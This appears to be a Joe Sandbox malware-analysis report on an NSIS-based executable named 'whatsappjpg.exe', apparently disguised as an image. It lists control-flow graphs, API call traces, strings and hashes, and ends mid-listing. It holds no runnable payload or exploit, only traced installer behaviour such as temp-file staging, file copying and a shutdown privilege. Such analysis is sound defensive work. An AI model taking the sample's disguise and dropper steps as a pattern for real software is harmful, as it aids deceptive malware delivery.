API calls 4856->4863 4859 401423 25 API calls 4857->4859 4858 405960 CharNextW 4860 4015d7 CreateDirectoryW 4858->4860 4861 401620 4859->4861 4862 4015ed GetLastError 4860->4862 4860->4865 4869 405ee8 lstrcpynW 4861->4869 4862->4865 4866 4015fa GetFileAttributesW 4862->4866 4868 40163e 4863->4868 4865->4855 4865->4858 4866->4865 4867 40162d SetCurrentDirectoryW 4867->4868 4869->4867 5645 401939 5646 402b38 18 API calls 5645->5646 5647 401940 lstrlenW 5646->5647 5648 4024e6 5647->5648 5649 402939 5650 402b1b 18 API calls 5649->5650 5651 40293f 5650->5651 5652 402972 5651->5652 5654 40294d 5651->5654 5655 402791 5651->5655 5653 405f0a 18 API calls 5652->5653 5652->5655 5653->5655 5654->5655 5657 405e2f wsprintfW 5654->5657 5657->5655 5658 40653d 5664 4063c1 5658->5664 5659 406d2c 5660 406442 GlobalFree 5661 40644b GlobalAlloc 5660->5661 5661->5659 5661->5664 5662 4064c2 GlobalAlloc 5662->5659 5662->5664 5663 4064b9 GlobalFree 5663->5662 5664->5659 5664->5660 5664->5661 5664->5662 5664->5663 4901 40173f 4902 402b38 18 API calls 4901->4902 4903 401746 4902->4903 4904 405b83 2 API calls 4903->4904 4905 40174d 4904->4905 4906 405b83 2 API calls 4905->4906 4906->4905

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 16 4034f8-403512 GetTempPathW call 403324 12->16 14 403417-40341c 13->14 15 40341e-403424 13->15 14->14 14->15 18 403426-40342a 15->18 19 40342b-40342f 15->19 23 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 16->23 24 40356a-403584 DeleteFileW call 402dba 16->24 18->19 21 403435-40343b 19->21 22 4034c9-4034d4 call 405960 19->22 26 403455-40346c 21->26 27 40343d-403444 21->27 22->11 39 4034d6-4034d7 22->39 23->24 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 23->42 44 40361a-403629 call 4037c0 OleUninitialize 24->44 45 40358a-403590 24->45 30 40349a-4034b0 26->30 31 40346e-403484 26->31 28 403446-403449 27->28 29 40344b 27->29 28->26 28->29 29->26 30->22 37 4034b2-4034c7 30->37 31->30 35 403486-40348e 31->35 40 403490-403493 35->40 41 403495 35->41 37->22 43 4034e6-4034f3 call 405ee8 37->43 39->11 40->30 40->41 41->30 42->24 42->44 43->16 57 403725-40372b 44->57 58 40362f-40363f call 4056c4 ExitProcess 44->58 49 403592-40359d call 405960 45->49 50 40360a-403611 call 4038b2 45->50 59 4035d4-4035de 49->59 60 40359f-4035b0 49->60 56 403616 50->56 56->44 62 4037a8-4037b0 57->62 63 40372d-40374a call 406252 * 3 57->63 68 4035e0-4035ee call 405a3b 59->68 69 403645-40365f lstrcatW lstrcmpiW 59->69 65 4035b2-4035b4 60->65 66 4037b2 62->66 67 4037b6-4037ba ExitProcess 62->67 90 403794-40379f ExitWindowsEx 63->90 91 40374c-40374e 63->91 72 4035b6-4035cc 65->72 73 4035ce-4035d2 65->73 66->67 68->44 81 4035f0-403606 call 405ee8 * 2 68->81 69->44 75 403661-403677 CreateDirectoryW SetCurrentDirectoryW 69->75 72->59 72->73 73->59 73->65 78 403684-4036ad call 405ee8 75->78 79 403679-40367f call 405ee8 75->79 89 4036b2-4036ce call 405f0a DeleteFileW 78->89 79->78 81->50 99 4036d0-4036e0 CopyFileW 89->99 100 40370f-403717 89->100 90->62 94 4037a1-4037a3 call 40140b 90->94 91->90 96 403750-403752 91->96 94->62 96->90 101 403754-403766 GetCurrentProcess 96->101 99->100 102 4036e2-403702 call 405d82 call 405f0a call 405663 99->102 100->89 103 403719-403720 call 405d82 100->103 101->90 108 403768-40378a 101->108 102->100 115 403704-40370b CloseHandle 102->115 103->44 108->90 115->100
                                                      APIs
                                                      • #17.COMCTL32 ref: 00403377
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                                                      • OleInitialize.OLE32(00000000), ref: 00403389
                                                        • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                        • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                        • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                      • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                        • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                      • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\whatsappjpg.exe",00000000), ref: 004033D9
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\whatsappjpg.exe",00000020), ref: 00403400
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                                                      • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                                                      • OleUninitialize.OLE32(?), ref: 0040361F
                                                      • ExitProcess.KERNEL32 ref: 0040363F
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\whatsappjpg.exe",00000000,?), ref: 0040364B
                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\whatsappjpg.exe",00000000,?), ref: 00403657
                                                      • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                                                      • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\whatsappjpg.exe,0041FE90,?), ref: 004036D8
                                                      • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                      • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                      • ExitProcess.KERNEL32 ref: 004037BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                      • String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\whatsappjpg.exe$C:\Users\user\Uploadable\normallnnens$C:\Users\user\Uploadable\normallnnens$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                      • API String ID: 4107622049-615831552
                                                      • Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                                                      • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                      • Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                                                      • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 116 4052d1-4052ec 117 4052f2-4053bb GetDlgItem * 3 call 404162 call 404a2f GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40547d-405484 116->118 136 4053d9-4053dc 117->136 137 4053bd-4053d7 SendMessageW * 2 117->137 120 405486-4054a8 GetDlgItem CreateThread CloseHandle 118->120 121 4054ae-4054bb 118->121 120->121 122 4054d9-4054e3 121->122 123 4054bd-4054c3 121->123 127 4054e5-4054eb 122->127 128 405539-40553d 122->128 125 4054c5-4054d4 ShowWindow * 2 call 404162 123->125 126 4054fe-405507 call 404194 123->126 125->122 140 40550c-405510 126->140 132 405513-405523 ShowWindow 127->132 133 4054ed-4054f9 call 404106 127->133 128->126 130 40553f-405545 128->130 130->126 138 405547-40555a SendMessageW 130->138 141 405533-405534 call 404106 132->141 142 405525-40552e call 405192 132->142 133->126 143 4053ec-405403 call 40412d 136->143 144 4053de-4053ea SendMessageW 136->144 137->136 145 405560-40558b CreatePopupMenu call 405f0a AppendMenuW 138->145 146 40565c-40565e 138->146 141->128 142->141 155 405405-405419 ShowWindow 143->155 156 405439-40545a GetDlgItem SendMessageW 143->156 144->143 153 4055a0-4055b5 TrackPopupMenu 145->153 154 40558d-40559d GetWindowRect 145->154 146->140 153->146 157 4055bb-4055d2 153->157 154->153 158 405428 155->158 159 40541b-405426 ShowWindow 155->159 156->146 160 405460-405478 SendMessageW * 2 156->160 161 4055d7-4055f2 SendMessageW 157->161 162 40542e-405434 call 404162 158->162 159->162 160->146 161->161 163 4055f4-405617 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->156 165 405619-405640 SendMessageW 163->165 165->165 166 405642-405656 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->146
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                      • GetClientRect.USER32(?,?), ref: 0040537C
                                                      • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405420
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                        • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                      • CloseHandle.KERNELBASE(00000000), ref: 004054A8
                                                      • ShowWindow.USER32(00000000), ref: 004054CC
                                                      • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                      • ShowWindow.USER32(00000008), ref: 0040551B
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                      • CreatePopupMenu.USER32 ref: 00405560
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                      • GetWindowRect.USER32(?,?), ref: 00405594
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                      • OpenClipboard.USER32(00000000), ref: 004055F5
                                                      • EmptyClipboard.USER32 ref: 004055FB
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                      • CloseClipboard.USER32 ref: 00405656
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {$kS
                                                      • API String ID: 590372296-3108425004
                                                      • Opcode ID: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
                                                      • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                      • Opcode Fuzzy Hash: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
                                                      • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 412 405f0a-405f15 413 405f17-405f26 412->413 414 405f28-405f3e 412->414 413->414 415 405f44-405f51 414->415 416 406156-40615c 414->416 415->416 419 405f57-405f5e 415->419 417 406162-40616d 416->417 418 405f63-405f70 416->418 420 406178-406179 417->420 421 40616f-406173 call 405ee8 417->421 418->417 422 405f76-405f82 418->422 419->416 421->420 424 406143 422->424 425 405f88-405fc4 422->425 426 406151-406154 424->426 427 406145-40614f 424->427 428 4060e4-4060e8 425->428 429 405fca-405fd5 GetVersion 425->429 426->416 427->416 430 4060ea-4060ee 428->430 431 40611d-406121 428->431 432 405fd7-405fdb 429->432 433 405fef 429->433 435 4060f0-4060fc call 405e2f 430->435 436 4060fe-40610b call 405ee8 430->436 438 406130-406141 lstrlenW 431->438 439 406123-40612b call 405f0a 431->439 432->433 434 405fdd-405fe1 432->434 437 405ff6-405ffd 433->437 434->433 440 405fe3-405fe7 434->440 450 406110-406119 435->450 436->450 442 406002-406004 437->442 443 405fff-406001 437->443 438->416 439->438 440->433 446 405fe9-405fed 440->446 448 406040-406043 442->448 449 406006-40602c call 405db5 442->449 443->442 446->437 453 406053-406056 448->453 454 406045-406051 GetSystemDirectoryW 448->454 461 406032-40603b call 405f0a 449->461 462 4060cb-4060cf 449->462 450->438 452 40611b 450->452 458 4060dc-4060e2 call 40617c 452->458 455 4060c1-4060c3 453->455 456 406058-406066 GetWindowsDirectoryW 453->456 459 4060c5-4060c9 454->459 455->459 460 406068-406072 455->460 456->455 458->438 459->458 459->462 464 406074-406077 460->464 465 40608c-4060a2 SHGetSpecialFolderLocation 460->465 461->459 462->458 467 4060d1-4060d7 lstrcatW 462->467 464->465 469 406079-406080 464->469 470 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 465->470 471 4060bd 465->471 467->458 473 406088-40608a 469->473 470->459 470->471 471->455 473->459 473->465
                                                      APIs
                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 00405FCD
                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604B
                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 0040605E
                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060A8
                                                      • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 00406131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 900638850-4157780569
                                                      • Opcode ID: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
                                                      • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                      • Opcode Fuzzy Hash: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
                                                      • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 673 405770-405796 call 405a3b 676 405798-4057aa DeleteFileW 673->676 677 4057af-4057b6 673->677 678 40592c-405930 676->678 679 4057b8-4057ba 677->679 680 4057c9-4057d9 call 405ee8 677->680 681 4057c0-4057c3 679->681 682 4058da-4058df 679->682 686 4057e8-4057e9 call 40597f 680->686 687 4057db-4057e6 lstrcatW 680->687 681->680 681->682 682->678 685 4058e1-4058e4 682->685 688 4058e6-4058ec 685->688 689 4058ee-4058f6 call 40622b 685->689 691 4057ee-4057f2 686->691 687->691 688->678 689->678 697 4058f8-40590c call 405933 call 405728 689->697 694 4057f4-4057fc 691->694 695 4057fe-405804 lstrcatW 691->695 694->695 696 405809-405825 lstrlenW FindFirstFileW 694->696 695->696 698 40582b-405833 696->698 699 4058cf-4058d3 696->699 713 405924-405927 call 405192 697->713 714 40590e-405911 697->714 701 405853-405867 call 405ee8 698->701 702 405835-40583d 698->702 699->682 704 4058d5 699->704 715 405869-405871 701->715 716 40587e-405889 call 405728 701->716 705 4058b2-4058c2 FindNextFileW 702->705 706 40583f-405847 702->706 704->682 705->698 712 4058c8-4058c9 FindClose 705->712 706->701 709 405849-405851 706->709 709->701 709->705 712->699 713->678 714->688 717 405913-405922 call 405192 call 405d82 714->717 715->705 718 405873-40587c call 405770 715->718 726 4058aa-4058ad call 405192 716->726 727 40588b-40588e 716->727 717->678 718->705 726->705 728 405890-4058a0 call 405192 call 405d82 727->728 729 4058a2-4058a8 727->729 728->705 729->705
                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 00405799
                                                      • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 004057E1
                                                      • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 00405804
                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 0040580A
                                                      • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 0040581A
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                      • FindClose.KERNEL32(00000000), ref: 004058C9
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                      • "C:\Users\user\Desktop\whatsappjpg.exe", xrefs: 00405779
                                                      • \*.*, xrefs: 004057DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                      • API String ID: 2035342205-1167077783
                                                      • Opcode ID: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
                                                      • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                      • Opcode Fuzzy Hash: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
                                                      • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 737 401752-401777 call 402b38 call 4059aa 742 401781-401793 call 405ee8 call 405933 lstrcatW 737->742 743 401779-40177f call 405ee8 737->743 748 401798-401799 call 40617c 742->748 743->748 752 40179e-4017a2 748->752 753 4017a4-4017ae call 40622b 752->753 754 4017d5-4017d8 752->754 761 4017c0-4017d2 753->761 762 4017b0-4017be CompareFileTime 753->762 756 4017e0-4017fc call 405b54 754->756 757 4017da-4017db call 405b2f 754->757 764 401870-401899 call 405192 call 403060 756->764 765 4017fe-401801 756->765 757->756 761->754 762->761 777 4018a1-4018ad SetFileTime 764->777 778 40189b-40189f 764->778 766 401852-40185c call 405192 765->766 767 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 765->767 779 401865-40186b 766->779 767->752 799 401847-401848 767->799 782 4018b3-4018be CloseHandle 777->782 778->777 778->782 783 4029ce 779->783 786 4018c4-4018c7 782->786 787 4029c5-4029c8 782->787 785 4029d0-4029d4 783->785 789 4018c9-4018da call 405f0a lstrcatW 786->789 790 4018dc-4018df call 405f0a 786->790 787->783 796 4018e4-402241 call 4056c4 789->796 790->796 796->785 799->779 801 40184a-40184b 799->801 801->766
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens,?,?,00000031), ref: 00401793
                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens,?,?,00000031), ref: 004017B8
                                                        • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                        • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                        • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
